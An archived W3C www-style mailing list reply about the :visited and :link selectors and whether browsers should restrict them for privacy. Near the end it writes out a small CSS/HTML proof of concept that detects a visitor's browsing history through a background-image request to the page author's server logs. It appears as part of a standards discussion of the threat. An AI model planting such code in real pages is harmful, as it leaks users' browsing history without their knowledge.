W3C home > Mailing lists > Public > www-style@w3.org > August 2010

Re: NodeSelector, :visited, and :link

From: Alan Gresley <alan@css-class.com>
Date: Thu, 26 Aug 2010 22:32:39 +1000
Message-ID: <4C765EE7.4090803@css-class.com>
To: Garrett Smith <dhtmlkitchen@gmail.com>
CC: Brad Kemper <brad.kemper@gmail.com>, Boris Zbarsky <bzbarsky@mit.edu>, Patrick Garies <pgaries@fastmail.us>, www-style <www-style@w3.org>
Garrett Smith wrote:
> On 8/25/10, Brad Kemper <brad.kemper@gmail.com> wrote:
>> On Aug 25, 2010, at 10:42 PM, Garrett Smith <dhtmlkitchen@gmail.com> wrote:
>>
>>> On 8/25/10, Brad Kemper <brad.kemper@gmail.com> wrote:
>>>>
>>>> On Aug 25, 2010, at 9:25 PM, Garrett Smith <dhtmlkitchen@gmail.com>
>>>> wrote:
>>>>
> [...]
>> If "and?" was instead intended to mean "and given that it is a serious
>> security issue, then why not address my earlier point about making the moe
>> secure behavior required instead of optional,", then I'd say one reason is
>> that not all UAs are Web browsers. For instance, for an HTML-based help
>> system, authored entirely by a controlled OS team, and unable to browse the
>> Web, it might be more important to be able to differentiate responses based
>> on what help files you've already seen, than to deal with a threat that
>> doesn't really apply to it in it's limited scope.
> 
> Fine example there. This doesn't work in most browsers and so any
> developer tasked with that might try it. If he finds that it works in
> the one browser that he's required to support, he'll use it. A
> non-interoperable website is born.
> 
> The feature is designed to be not interoperable and I think that it
> may lead to compatibility problems.


I don't quite understand what is not interoperable and you may have 
already provided this point earlier in this thread or another thread.


> There aren't any web apis for file protocol, so maybe your help-system
> should focus on that. You might also notice the variations of
> anomalies with XMLHttpRequest on local file protocol.


I will answer this not quite understanding what you are saying. Such 
phishing attacks usually affects the lest web savoy who would likely 
be the same people who would not quite understand a question like.

   | Please select this box to disable your browsing history
   | to guard against possible phishing attacks.


There is no need to know scripting to exploit this. One only needs a 
hosting with log files and medium knowledge of HTML and CSS.


[href="http://www.google.com.au/"]:visited {
   background: url(any.jpg);
}

#test {
   position: absolute;
   left: -10000px;
}


<a id="test" href="http://www.google.com.au/">




-- 
Alan http://css-class.com/

Armies Cannot Stop An Idea Whose Time Has Come. - Victor Hugo
Received on Thursday, 26 August 2010 12:33:12 GMT

This archive was generated by hypermail 2.3.1 : Tuesday, 26 March 2013 17:20:30 GMT